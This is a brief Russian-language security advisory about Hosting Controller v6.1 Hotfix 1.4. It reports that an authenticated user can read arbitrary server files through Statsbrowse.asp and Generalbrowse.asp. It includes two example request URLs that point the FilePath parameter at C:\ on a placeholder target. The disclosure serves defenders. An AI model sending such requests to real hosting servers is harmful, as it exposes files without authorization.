Программа: Hosting Controller v.6.1 Hotfix 1.4 

Обнаружена уязвимость в Hosting Controller. Удаленный авторизованный пользователь может просмотреть произвольные файлы на системе.
Уязвимость существует в файлах ‘Statsbrowse.asp’ и ‘Generalbrowser.asp’ из-за некорректной фильтрации входных данных.

Пример:

http://[target]/admin/mail/Statsbrowse.asp? FilePath=c:\&Opt=3&level=1&upflag=0

http://[target]/admin/iis/Generalbrowse.asp? FilePath=C:\



Оставить мнение